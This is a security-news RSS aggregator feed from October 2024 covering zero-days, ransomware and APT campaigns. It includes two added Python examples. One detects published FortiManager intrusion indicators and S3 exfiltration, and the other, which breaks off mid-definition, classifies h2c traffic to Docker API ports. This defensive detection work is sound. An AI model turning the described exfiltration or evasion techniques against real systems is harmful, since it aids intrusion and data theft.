www.secnews.physaphae.fr: RSS 2.0 feed from www.secnews.physaphae.fr. This is a simple aggregated flow of articles from multiple sources; the list of sources can be found on www.secnews.physaphae.fr. Feed generated 2025-05-12T11:33:43+00:00.

RiskIQ (now Microsoft): Severe flaws in E2EE cloud storage platforms used by millions
2024-10-25T16:15:13+00:00 https://community.riskiq.com/article/471a59d3 | www.secnews.physaphae.fr/article.php?IdArticle=8601739
Tags: Spam, Malware, Vulnerability, Threat, Studies, Mobile, Cloud

RiskIQ (now Microsoft): The Crypto Game of Lazarus APT: Investors vs. Zero-days
2024-10-25T16:11:10+00:00 https://community.riskiq.com/article/e831e4ae | www.secnews.physaphae.fr/article.php?IdArticle=8601740
Tags: Ransomware, Malware, Tool, Vulnerability, Threat; Actor: APT 38

HackRead: UNC5820 Exploits FortiManager Zero-Day Vulnerability (CVE-2024-47575)
Fortinet and Mandiant investigated the mass exploitation of FortiManager devices via CVE-2024-47575, impacting 50+ systems across industries. Threat…
2024-10-25T12:03:48+00:00 https://hackread.com/unc5820-exploits-fortimanager-zero-day-vulnerability/ | www.secnews.physaphae.fr/article.php?IdArticle=8601677
Tags: Vulnerability, Threat

Proofpoint: A Global Manufacturer's Journey: Making the Switch from Abnormal Security to Proofpoint
2024-10-25T10:37:05+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/making-the-switch-abnormal-to-proofpoint | www.secnews.physaphae.fr/article.php?IdArticle=8601780
Tags: Ransomware, Malware, Tool, Threat, Industrial, Cloud

Project Zero (Google research blog): The Windows Registry Adventure #4: Hives and the registry layout
Diagram: the call stack for the RegCreateKeyEx function in Windows, showing the transition from user mode to kernel mode through the successive API layers:
- User mode: Application.exe calls RegCreateKeyEx in KernelBase.dll; KernelBase.dll calls NtCreateKey in ntdll.dll; ntdll.dll issues the NtCreateKey system call.
- Kernel mode: ntoskrnl.exe executes the NtCreateKey syscall.
In this example, Application.exe is a desktop program calling the documented RegCreateKeyEx function, which is exported by KernelBase.dll. KernelBase.dll implements RegCreateKeyEx by translating the high-level API parameters passed by the caller (paths, flags, etc.) into internal ones understood by the kernel. It then invokes the NtCreateKey system call through a thin wrapper provided by ntdll.dll, and execution finally reaches the Windows kernel, where all of the actual work on the internal registry representation is performed.
2024-10-25T10:30:02+00:00 https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html | www.secnews.physaphae.fr/article.php?IdArticle=8601741
Tags: Tool, Vulnerability, Threat, Legislation, Technical; Actor: APT 17

InfoSecurity Magazine: MacOS-Focused Ransomware Attempts Leverage LockBit Brand
An unidentified threat actor has attempted to develop ransomware targeting macOS devices, posing as LockBit.
2024-10-25T08:00:00+00:00 https://www.infosecurity-magazine.com/news/macos-ransomware-attempts-leverage/ | www.secnews.physaphae.fr/article.php?IdArticle=8601645
Tags: Ransomware, Threat

Global Security Mag (French news site): The Lazarus APT group exploited a zero-day vulnerability in Chrome to steal cryptocurrency
Section: Investigations
2024-10-24T23:33:00+00:00 https://www.globalsecuritymag.fr/le-groupe-apt-lazarus-a-exploite-une-vulnerabilite-zero-day-dans-chrome-pour.html | www.secnews.physaphae.fr/article.php?IdArticle=8602217
Tags: Vulnerability, Threat; Actor: APT 38

RiskIQ (now Microsoft): Subject of accounts in service UAC-0218: file theft with HOMESTEEL
2024-10-24T19:44:18+00:00 https://community.riskiq.com/article/d9d63acb | www.secnews.physaphae.fr/article.php?IdArticle=8601602
Tags: Ransomware, Tool, Threat

RiskIQ (now Microsoft): Threat actor abuses Gophish to deliver new PowerRAT and DCRAT
Excerpt (Microsoft mitigation list, truncated at both ends): [...] Preferences > Control Panel Settings > Folder Options.
- Create settings for the .jse and .js file extensions that associate them with notepad.exe or another text editor.
- Check your perimeter firewall and proxy to prevent servers from making arbitrary connections to the internet to browse or download files. These restrictions help inhibit malware downloads and command-and-control (C2) activity, including from mobile devices.
- Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Turn on network protection to block connections to malicious domains and IP addresses.
- Only install applications from trusted sources, such as the software platform's official app store. Third-party sources may have lax standards for the applications they host, making it easy to upload and distribute malware.
- Turn on cloud-delivered protection (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) and automatic sample submission on Microsoft Defender Antivirus (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/deploy-microsoft-defender-antivirus?ocid=magicti_ta_learndoc). These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
- Run the latest version of your operating systems (https://support.microsoft.com/windo
2024-10-24T19:05:47+00:00 https://community.riskiq.com/article/055c91ec | www.secnews.physaphae.fr/article.php?IdArticle=8601603
Tags: Spam, Malware, Tool, Vulnerability, Threat, Mobile

The Hacker News: Cisco Issues Urgent Fix for ASA and FTD Software Vulnerability Under Active Attack
Cisco on Wednesday said it has released updates to address an actively exploited security flaw in its Adaptive Security Appliance (ASA) that could lead to a denial-of-service (DoS) condition. The vulnerability, tracked as CVE-2024-20481 (CVSS score: 5.8), affects the Remote Access VPN (RAVPN) service of Cisco ASA and Cisco Firepower Threat Defense (FTD) Software. Arising due to resource
2024-10-24T18:11:00+00:00 https://thehackernews.com/2024/10/cisco-issues-urgent-fix-for-asa-and-ftd.html | www.secnews.physaphae.fr/article.php?IdArticle=8601547
Tags: Vulnerability, Threat

RiskIQ (now Microsoft): Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction
2024-10-24T18:07:45+00:00 https://community.riskiq.com/article/7aaa2cae | www.secnews.physaphae.fr/article.php?IdArticle=8601595
Tags: Vulnerability, Threat, Studies

HackRead: Lazarus Group Exploits Chrome 0-Day for Crypto with Fake NFT Game
North Korean hackers from Lazarus Group exploited a zero-day vulnerability in Google Chrome to target cryptocurrency investors with…
2024-10-24T17:38:25+00:00 https://hackread.com/north-korean-hackers-crypto-deceptive-game-zero-day-exploit/ | www.secnews.physaphae.fr/article.php?IdArticle=8601586
Tags: Vulnerability, Threat; Actor: APT 38

RiskIQ (now Microsoft): Highlighting TA866/Asylum Ambuscade Activity Since 2021
2024-10-24T16:59:26+00:00 https://community.riskiq.com/article/db27b5bb | www.secnews.physaphae.fr/article.php?IdArticle=8601581
Tags: Ransomware, Malware, Tool, Threat

Cybereason (vendor blog): Unlocking the Potential of AI in Cybersecurity: Embracing the Future and Its Complexities
2024-10-24T16:00:44+00:00 https://www.cybereason.com/blog/unlocking-the-potential-of-ai-in-cybersecurity-embracing-the-future-and-its-complexities | www.secnews.physaphae.fr/article.php?IdArticle=8601584
Tags: Tool, Threat

InfoSecurity Magazine: Lazarus Group Exploits Google Chrome Flaw in New Campaign
Lazarus Group exploited a Google Chrome zero-day, infecting systems with Manuscrypt malware.
2024-10-24T16:00:00+00:00 https://www.infosecurity-magazine.com/news/lazarus-group-exploits-google/ | www.secnews.physaphae.fr/article.php?IdArticle=8601571
Tags: Malware, Vulnerability, Threat; Actor: APT 38

The Hacker News: Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices
The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices. Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor. This entails triggering the
2024-10-24T15:23:00+00:00 https://thehackernews.com/2024/10/lazarus-group-exploits-google-chrome.html | www.secnews.physaphae.fr/article.php?IdArticle=8601531
Tags: Vulnerability, Threat; Actor: APT 38

Dark Reading: Cisco ASA, FTD Software Under Active VPN Exploitation
Unauthenticated threat actors can remotely cause a denial-of-service (DoS) condition in the Remote Access VPN software in Cisco's ASA and Firepower software.
2024-10-24T15:18:54+00:00 https://www.darkreading.com/application-security/cisco-asa-ftd-software-active-vpn-exploitation | www.secnews.physaphae.fr/article.php?IdArticle=8601568
Tags: Threat

SentinelOne (research): Cloud Malware | A Threat Hunter's Guide to Analysis, Techniques and Delivery
Learn about cloud threats, how to hunt for them and how to analyze them in this post based on Alex Delamotte's recent LABScon workshop.
2024-10-24T15:17:35+00:00 https://www.sentinelone.com/labs/cloud-malware-a-threat-hunters-guide-to-analysis-techniques-and-delivery/ | www.secnews.physaphae.fr/article.php?IdArticle=8601565
Tags: Malware, Threat, Cloud

BleepingComputer: Cisco fixes VPN DoS flaw discovered in password spray attacks
Cisco fixed a denial-of-service flaw in its Cisco ASA and Firepower Threat Defense (FTD) software, which was discovered during large-scale brute-force attacks against Cisco VPN devices in April. [...]
2024-10-24T14:06:30+00:00 https://www.bleepingcomputer.com/news/security/cisco-fixes-vpn-dos-flaw-discovered-in-password-spray-attacks/ | www.secnews.physaphae.fr/article.php?IdArticle=8601592
Tags: Threat

SecurityWeek: North Korean Hackers Exploited Chrome Zero-Day for Cryptocurrency Theft
The Lazarus APT created a deceptive website that exploited a Chrome zero-day to install malware and steal cryptocurrency.
2024-10-24T13:02:10+00:00 https://www.securityweek.com/north-korean-hackers-exploited-chrome-zero-day-for-cryptocurrency-theft/ | www.secnews.physaphae.fr/article.php?IdArticle=8601542
Tags: Malware, Vulnerability, Threat; Actor: APT 38

InfoSecurity Magazine: Fortinet Confirms Exploitation of Critical FortiManager Zero-Day Vulnerability
This high-severity flaw, dubbed FortiJump by security researcher Kevin Beaumont, has been added to CISA's KEV catalog.
2024-10-24T10:45:00+00:00 https://www.infosecurity-magazine.com/news/fortinet-exploitation-fortimanager/ | www.secnews.physaphae.fr/article.php?IdArticle=8601535
Tags: Vulnerability, Threat

The State of Security (Tripwire): NotLockBit: Ransomware Discovery Serves As Wake-Up Call For Mac Users
Historically, Mac users haven't had to worry about malware as much as their Windows-using cousins. Although malware targeting Apple devices actually predates viruses written for PCs, and there have been some families of malware that have presented a significant threat for both operating systems (for instance, the Word macro viruses that hit computers hard from 1995 onwards), it is generally the case that you're simply a lot less likely to encounter malware on your Mac than you are on your Windows PC. But that doesn't mean that Mac users should be complacent. And the recent discovery of a new...
2024-10-24T10:11:51+00:00 https://www.tripwire.com/state-of-security/notlockbit-rransomware-discovery-serves-wake-call-mac-users | www.secnews.physaphae.fr/article.php?IdArticle=8601566
Tags: Ransomware, Malware, Threat

UnderNews (French news site): With the rise of AI, every organisation should adopt these five measures to guard against cyber risks
AI brings many benefits, but cybercriminals also use the technology for malicious ends: to increase the volume and speed of the attacks they deploy, or to craft more credible threats. Fortinet op-ed: Organisations around the world are well aware of this, and executives are putting initiatives in place to [...] The post "Avec l'essor de l'IA, toutes organisations devraient adopter ces cinq mesures pour se prémunir face aux risques cyber" first appeared on UnderNews.
2024-10-24T09:38:07+00:00 https://www.undernews.fr/reseau-securite/avec-lessor-de-lia-toutes-organisations-devraient-adopter-ces-cinq-mesures-pour-se-premunir-face-aux-risques-cyber.html | www.secnews.physaphae.fr/article.php?IdArticle=8601534
Tags: Threat

The Register: Samsung phone users under attack, Google warns
Don't ignore this nasty zero-day exploit, says TAG. A nasty bug in Samsung's mobile chips is being exploited by miscreants as part of an exploit chain to escalate privileges and then remotely execute arbitrary code, according to Google security researchers.…
2024-10-24T00:16:09+00:00 https://go.theregister.com/feed/www.theregister.com/2024/10/24/samsung_phone_eop_attacks/ | www.secnews.physaphae.fr/article.php?IdArticle=8601501
Tags: Threat, Mobile

Dark Reading: Lazarus Group Exploits Chrome Zero-Day in Latest Campaign
The North Korean actor is going after cryptocurrency investors worldwide, leveraging a genuine-looking game site and AI-generated content and images.
2024-10-23T20:55:13+00:00 https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-exploits-chrome-zero-day-campaign | www.secnews.physaphae.fr/article.php?IdArticle=8601480
Tags: Vulnerability, Threat; Actor: APT 38

Mandiant: Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)
Summary
In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. The vulnerability, CVE-2024-47575 / FG-IR-24-423, allows a threat actor to use an unauthorized, threat-actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices.
Mandiant observed a new threat cluster, now tracked as UNC5820, exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. It could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment.
At this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of the investigation there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, Mandiant lacks sufficient data to assess actor motivation or location and will update the blog's attribution assessment as additional information becomes available. Organizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately.
Exploitation Details
Mandiant's earliest observed exploitation attempt occurred on June 27, 2024. On that day, a FortiManager device received inbound connections from the IP address 45[.]32[.]41[.]202 on the default port TCP/541. At approximately the same time, the file system recorded the staging of various Fortinet configuration files in a Gzip-compressed archive named /tmp/.tm. This archive contained the files and folders listed in Table 1.
2024-10-23T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/ | www.secnews.physaphae.fr/article.php?IdArticle=8601490
Tags: Vulnerability, Threat, Cloud

Dark Reading: Microsoft SharePoint Vuln Is Under Active Exploit
The risk of exploitation is heightened thanks to a proof-of-concept that has been made publicly available.
2024-10-23T19:34:30+00:00 https://www.darkreading.com/vulnerabilities-threats/microsoft-sharepoint-vuln-active-exploit | www.secnews.physaphae.fr/article.php?IdArticle=8601469
Tags: Threat

RiskIQ (now Microsoft): Fake attachment. Roundcube mail server attacks exploit CVE-2024-37383 vulnerability.
2024-10-23T16:34:48+00:00 https://community.riskiq.com/article/7c0b1160 | www.secnews.physaphae.fr/article.php?IdArticle=8601330
Tags: Vulnerability, Threat; Actor: APT 28

Dark Reading: Mobile Apps With Millions of Downloads Expose Cloud Credentials
Popular titles on both Google Play and Apple's App Store include hardcoded and unencrypted AWS and Azure credentials in their codebases or binaries, making them vulnerable to misuse by threat actors.
2024-10-23T15:44:38+00:00 https://www.darkreading.com/cloud-security/mobile-apps-millions-downloads-expose-cloud-credentials | www.secnews.physaphae.fr/article.php?IdArticle=8601407
Tags: Threat, Mobile, Cloud

The Hacker News: Ransomware Gangs Use LockBit's Fame to Intimidate Victims in Latest Attacks
Threat actors have been observed abusing the Amazon S3 (Simple Storage Service) Transfer Acceleration feature as part of ransomware attacks designed to exfiltrate victim data and upload it to S3 buckets under their control. "Attempts were made to disguise the Golang ransomware as the notorious LockBit ransomware," Trend Micro researchers Jaromir Horejsi and Nitesh Surana said. "However, such is
2024-10-23T15:00:00+00:00 https://thehackernews.com/2024/10/ransomware-gangs-use-lockbits-fame-to.html | www.secnews.physaphae.fr/article.php?IdArticle=8601393
Tags: Ransomware, Threat, Prediction

UnderNews (French news site): Netskope Threat Labs research: the return of the Bumblebee malware
The Netskope Threat Labs team recently discovered what appears to be a new attack chain leading to infection with the Bumblebee malware, and their findings corroborate those of other researchers. Op-ed: Bumblebee is a highly sophisticated malware that cybercriminals use to gain access to corporate networks and deliver other payloads such as [...] The post "Recherche Netskope Threat Labs – Le retour du malware Bumblebee" first appeared on UnderNews.
2024-10-23T13:28:04+00:00 https://www.undernews.fr/malwares-virus-antivirus/recherche-netskope-threat-labs-le-retour-du-malware-bumblebee.html | www.secnews.physaphae.fr/article.php?IdArticle=8601351
Tags: Malware, Threat

Netskope: Attackers Target Crypto Wallets Using Codeless Webflow Phishing Pages
Summary: From April to September 2024, Netskope Threat Labs tracked a 10-fold increase in traffic to phishing pages crafted through Webflow. The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for multiple company webmail platforms and for Microsoft 365. The campaigns […]
2024-10-23T13:00:00+00:00 https://www.netskope.com/blog/attackers-target-crypto-wallets-using-codeless-webflow-phishing-pages | www.secnews.physaphae.fr/article.php?IdArticle=8601444
Tags: Threat
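Two of the items above give indicators that are cheap to hunt for in existing telemetry. The Mandiant FortiManager write-up reports inbound connections on the FGFM port TCP/541 from a peer that was not a managed FortiGate, followed by configuration files being staged into /tmp/.tm; the Trend Micro finding relayed by The Hacker News reports exfiltration through S3 Transfer Acceleration, whose endpoints always have the shape <bucket>.s3-accelerate.amazonaws.com (or .s3-accelerate.dualstack.amazonaws.com). The script below is an added example of triaging key=value connection logs for both; it is not code from Mandiant, Trend Micro or the aggregator. The log lines, the managed-FortiGate inventory and the approved-bucket list are constructed for the example; 45[.]32[.]41[.]202 and /tmp/.tm are the indicators as published.

```python
"""Triage constructed key=value connection logs for indicators discussed in the feed above.
Added example; not code from Mandiant, Trend Micro or the aggregator."""
import re
import shlex

# Published indicator (defanged in the Mandiant write-up); refanged below for matching.
FORTIMANAGER_IOC_DEFANGED = "45[.]32[.]41[.]202"
FGFM_PORT = 541                  # default FortiGate <-> FortiManager (FGFM) port, TCP/541
STAGING_ARCHIVE = "/tmp/.tm"     # gzip archive into which managed-device configs were staged

# Assumed inventory: only these managed FortiGates should reach the FortiManager on TCP/541.
MANAGED_FORTIGATES = {"10.0.1.10", "10.0.1.11", "10.0.2.10"}
# Assumed: buckets this organisation legitimately uses through Transfer Acceleration.
APPROVED_ACCEL_BUCKETS = {"corp-backups-eu"}

# Transfer Acceleration endpoints look like <bucket>.s3-accelerate[.dualstack].amazonaws.com;
# accelerated buckets cannot contain periods, so the bucket label is unambiguous.
ACCEL_HOST_RE = re.compile(
    r"^(?P<bucket>[a-z0-9-]{3,63})\.s3-accelerate(?:\.dualstack)?\.amazonaws\.com\.?$",
    re.IGNORECASE,
)


def refang(indicator: str) -> str:
    """Undo the usual [.] / hxxp defanging so an indicator can be compared with log fields."""
    return indicator.replace("[.]", ".").replace("hxxps", "https").replace("hxxp", "http")


FORTIMANAGER_IOC = refang(FORTIMANAGER_IOC_DEFANGED)


def parse_kv(line: str) -> dict:
    """Parse FortiGate-style 'key=value key2="quoted value"' syslog into a dict."""
    fields = {}
    for token in shlex.split(line):
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def check_fortimanager_access(ev: dict) -> list:
    """Rule 1: inbound TCP/541 to the FortiManager from anything that is not a managed FortiGate."""
    if ev.get("type") != "traffic" or ev.get("proto") != "6" or ev.get("dstport") != str(FGFM_PORT):
        return []
    src = ev.get("srcip", "")
    if src in MANAGED_FORTIGATES:
        return []
    if src == FORTIMANAGER_IOC:
        return [("high", f"TCP/541 from published UNC5820 address {src}")]
    return [("medium", f"TCP/541 from unmanaged peer {src}; check against the FortiGate inventory")]


def check_staging_artifact(ev: dict) -> list:
    """Rule 2: file event for the exact staging path Mandiant saw right after the TCP/541 connections."""
    if ev.get("type") == "file" and ev.get("path") == STAGING_ARCHIVE:
        return [("high", f"staging archive {STAGING_ARCHIVE} created on {ev.get('host', '?')}")]
    return []


def check_s3_accelerate(ev: dict) -> list:
    """Rule 3: DNS lookup of a Transfer Acceleration endpoint for a bucket this organisation does not own."""
    if ev.get("type") != "dns":
        return []
    m = ACCEL_HOST_RE.match(ev.get("qname", ""))
    if not m or m.group("bucket").lower() in APPROVED_ACCEL_BUCKETS:
        return []
    return [("high", f"{ev.get('srcip', '?')} resolved accelerate endpoint for unknown bucket {m.group('bucket')}")]


RULES = (check_fortimanager_access, check_staging_artifact, check_s3_accelerate)


def triage(lines) -> list:
    """Run every rule over every line; return (severity, message) findings in log order."""
    findings = []
    for line in lines:
        event = parse_kv(line)
        for rule in RULES:
            findings.extend(rule(event))
    return findings


# Constructed sample log lines (not real telemetry); 45.32.41.202 is the address Mandiant published.
CONSTRUCTED_LOGS = [
    'date=2024-06-27 time=10:15:02 type=traffic srcip=10.0.1.10 dstip=10.0.0.5 dstport=541 proto=6 action=accept',
    'date=2024-06-27 time=10:15:09 type=traffic srcip=45.32.41.202 dstip=10.0.0.5 dstport=541 proto=6 action=accept',
    'date=2024-06-27 time=10:15:10 type=traffic srcip=203.0.113.7 dstip=10.0.0.5 dstport=541 proto=6 action=accept',
    'date=2024-06-27 time=10:15:31 type=file host=fortimanager path=/tmp/.tm action=create',
    'date=2024-10-20 time=02:11:44 type=dns srcip=10.0.5.23 qname=corp-backups-eu.s3-accelerate.amazonaws.com',
    'date=2024-10-20 time=02:12:01 type=dns srcip=10.0.5.23 qname=x7pq9-dump.s3-accelerate.dualstack.amazonaws.com',
    'date=2024-10-20 time=02:12:05 type=dns srcip=10.0.5.23 qname=updates.example.net',
]

if __name__ == "__main__":
    for severity, message in triage(CONSTRUCTED_LOGS):
        print(f"[{severity}] {message}")
```

Rule 1 grades the published address as high and any other unmanaged peer as medium because Mandiant's indicator list reflects what was observed at the time, not the actor's full infrastructure; any unexpected TCP/541 source on an internet-exposed FortiManager deserves the forensic look the write-up recommends. Rule 3 keys on the bucket label rather than a blocklist of buckets because the accelerate hostname shape is fixed by AWS, which turns "exfiltration to an attacker bucket" into a simple allowlist question.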
Kaspersky (Securelist research blog): The Crypto Game of Lazarus APT: Investors vs. Zero-days
Kaspersky GReAT experts break down the new campaign of Lazarus APT, which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.
2024-10-23T11:00:48+00:00 https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/ | www.secnews.physaphae.fr/article.php?IdArticle=8601458
Tags: Vulnerability, Threat; Actor: APT 38

InfoSecurity Magazine: US Government Pledges to Cyber Threat Sharing Via TLP Protocol
The US government has issued guidance for federal agencies on the use of the Traffic Light Protocol, designed to boost intelligence sharing with the cybersecurity community.
2024-10-23T10:30:00+00:00 https://www.infosecurity-magazine.com/news/us-government-threat-sharing-tlp/ | www.secnews.physaphae.fr/article.php?IdArticle=8601375
Tags: Threat

The State of Security (Tripwire): Defending Against Ransom DDoS Attacks
DDoS attacks have become an annoyance most companies assume they may have to deal with at some point. While frustrating, minor website disruptions from small-scale hacktivist campaigns rarely create substantial business impacts. However, a particularly insidious DDoS spinoff has emerged over the past decade, one aimed at blackmail. This evolutionary milestone stems from what's called Ransom DDoS (RDDoS), likely one of the most outrageous cybercrime weapons targeting businesses globally since 2015. With this form of extortion, threat actors aim to swamp an organization's infrastructure with...
2024-10-23T05:17:08+00:00 https://www.tripwire.com/state-of-security/defending-against-ransom-ddos-attacks | www.secnews.physaphae.fr/article.php?IdArticle=8601368
Tags: Threat

Trend Micro: Unmasking Prometei: A Deep Dive Into Our MXDR Findings
How does Prometei insidiously operate in a compromised system? This Managed Extended Detection and Response investigation, conducted with the help of Trend Vision One, provides a comprehensive analysis of the inner workings of this botnet so users can stop the threat in its tracks before it inflicts damage on the system.
2024-10-23T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html | www.secnews.physaphae.fr/article.php?IdArticle=8601347
Tags: Threat, Prediction

Dark Reading: Samsung Zero-Day Vuln Under Active Exploit, Google Warns
If it's exploited, bad actors can execute arbitrary code while evading detection thanks to a renamed process.
2024-10-22T21:39:33+00:00 https://www.darkreading.com/endpoint-security/samsung-zero-day-vuln-under-active-exploit-google-warns | www.secnews.physaphae.fr/article.php?IdArticle=8601410
Tags: Vulnerability, Threat

RiskIQ (now Microsoft): THREAT ANALYSIS: Beast Ransomware
2024-10-22T21:29:09+00:00 https://community.riskiq.com/article/8e450441 | www.secnews.physaphae.fr/article.php?IdArticle=8601327
Tags: Ransomware, Spam, Malware, Tool, Threat

The Hacker News: Cybercriminals Exploiting Docker API Servers for SRBMiner Crypto Mining Attacks
Bad actors have been observed targeting Docker remote API servers to deploy the SRBMiner crypto miner on compromised instances, according to new findings from Trend Micro. "In this attack, the threat actor used the gRPC protocol over h2c to evade security solutions and execute their crypto mining operations on the Docker host," researchers Abdelrahman Esmail and Sunil Bharti said in a technical
2024-10-22T19:30:00+00:00 https://thehackernews.com/2024/10/cybercriminals-exploiting-docker-api.html | www.secnews.physaphae.fr/article.php?IdArticle=8601396
Tags: Threat, Prediction, Technical

RiskIQ (now Microsoft): UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants
2024-10-22T17:52:36+00:00 https://community.riskiq.com/article/a955e4eb | www.secnews.physaphae.fr/article.php?IdArticle=8601325
Tags: Ransomware, Malware, Tool, Vulnerability, Threat

RiskIQ (now Microsoft): Tricks and Treats: GHOSTPULSE's new pixel-level deception
2024-10-22T16:33:17+00:00 https://community.riskiq.com/article/252d9789 | www.secnews.physaphae.fr/article.php?IdArticle=8601324
Tags: Ransomware, Malware, Tool, Threat

RiskIQ (now Microsoft): Over 6,000 WordPress sites hacked to install plugins pushing infostealers
2024-10-22T15:57:30+00:00 https://community.riskiq.com/article/cac6b305 | www.secnews.physaphae.fr/article.php?IdArticle=8601322
Tags: Ransomware, Spam, Malware, Tool, Threat

RiskIQ (now Microsoft): Using gRPC and HTTP/2 for Cryptominer Deployment: An Unconventional Approach
2024-10-22T15:22:52+00:00 https://community.riskiq.com/article/5ce577b3 | www.secnews.physaphae.fr/article.php?IdArticle=8601323
Tags: Vulnerability, Threat, Prediction, Cloud

Global Security Mag (French news site): Stream.Security Secures $30 Million in Series B Funding
Section: Business News. Breakthrough Cloud Twin Model Powers the Only Real Time Cloud Threat & Exposure Detection and Response Solution that SecOps Teams Can Trust.
2024-10-22T14:10:41+00:00 https://www.globalsecuritymag.fr/stream-security-secures-30-million-in-series-b-funding.html | www.secnews.physaphae.fr/article.php?IdArticle=8601443
Tags: Threat, Cloud
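The Trend Micro finding quoted in the two Docker items above (gRPC over h2c to a Docker remote API host) works because HTTP/2 in cleartext can start in two ways, neither of which looks like the HTTP/1.1 request lines most inspection rules key on: an HTTP/1.1 request carrying "Connection: Upgrade" and "Upgrade: h2c" with a base64url-encoded SETTINGS payload in an HTTP2-Settings header, or "prior knowledge", where the client sends the fixed 24-byte connection preface "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n" and starts framing immediately. The classifier below is an added example, not Trend Micro's or Docker's code: it decides which of the two a client is doing from the first bytes of a connection and decodes the advertised SETTINGS. Ports 2375/2376 are Docker's default remote API ports and POST /grpc is the Engine route that accepts an h2c upgrade for BuildKit sessions; the request bytes themselves are constructed.

```python
"""Classify the first client bytes of a TCP connection to a Docker remote API port as plain HTTP/1.1,
an HTTP/1.1 -> h2c Upgrade, or HTTP/2 'prior knowledge'. Added example; not Trend Micro's or Docker's code."""
import base64
import struct

DOCKER_API_PORTS = {2375, 2376}                       # 2375 = plaintext remote API, 2376 = TLS
H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"        # RFC 7540 s3.5 client connection preface
SETTINGS_NAMES = {1: "HEADER_TABLE_SIZE", 2: "ENABLE_PUSH", 3: "MAX_CONCURRENT_STREAMS",
                  4: "INITIAL_WINDOW_SIZE", 5: "MAX_FRAME_SIZE", 6: "MAX_HEADER_LIST_SIZE"}


def decode_http2_settings(value: str) -> dict:
    """Decode an HTTP2-Settings header (base64url SETTINGS payload, RFC 7540 s3.2.1) into {name: value}."""
    raw = base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))   # header is sent without padding
    if len(raw) % 6:
        raise ValueError("SETTINGS payload must be a multiple of 6 bytes (16-bit id + 32-bit value)")
    settings = {}
    for offset in range(0, len(raw), 6):
        ident, val = struct.unpack("!HI", raw[offset:offset + 6])
        settings[SETTINGS_NAMES.get(ident, f"UNKNOWN_{ident}")] = val
    return settings


def parse_http1_head(data: bytes):
    """Split an HTTP/1.x request head into (request_line, {lowercase_name: value}); None if incomplete."""
    end = data.find(b"\r\n\r\n")
    if end < 0:
        return None
    lines = data[:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, val = line.partition(":")
        headers[name.strip().lower()] = val.strip()
    return lines[0], headers


def classify_client_hello(data: bytes, dst_port: int) -> dict:
    """Return how the peer is opening the session and whether the destination is a Docker API port."""
    result = {"dst_port": dst_port, "docker_api": dst_port in DOCKER_API_PORTS,
              "kind": "unknown", "target": None, "settings": {}}
    if data.startswith(H2_PREFACE):
        # Prior-knowledge h2c: there is no HTTP/1.1 request line at all, so request-line based
        # proxies and IDS signatures see only the preface and binary frames.
        result["kind"] = "h2c-prior-knowledge"
        return result
    parsed = parse_http1_head(data)
    if parsed is None:
        return result
    request_line, headers = parsed
    parts = request_line.split(" ")
    result["target"] = parts[1] if len(parts) == 3 else None
    connection_tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if headers.get("upgrade", "").lower() == "h2c" and "upgrade" in connection_tokens:
        result["kind"] = "h2c-upgrade"
        if "http2-settings" in headers:
            result["settings"] = decode_http2_settings(headers["http2-settings"])
    else:
        result["kind"] = "http1"
    return result


def docker_h2c_alerts(samples) -> list:
    """Alert on any h2c session (upgrade or prior knowledge) opened to a Docker API port."""
    alerts = []
    for data, port in samples:
        c = classify_client_hello(data, port)
        if c["docker_api"] and c["kind"].startswith("h2c"):
            alerts.append((c["kind"], c["target"]))
    return alerts


# Constructed samples (not captured traffic). The upgrade targets Docker's POST /grpc route.
CONSTRUCTED_UPGRADE = (
    b"POST /grpc HTTP/1.1\r\n"
    b"Host: 198.51.100.20:2375\r\n"
    b"Connection: Upgrade, HTTP2-Settings\r\n"
    b"Upgrade: h2c\r\n"
    b"HTTP2-Settings: AAMAAABkAAQAAP__\r\n"    # MAX_CONCURRENT_STREAMS=100, INITIAL_WINDOW_SIZE=65535
    b"\r\n"
)
# Preface followed by an empty SETTINGS frame (length 0, type 0x4, flags 0, stream 0).
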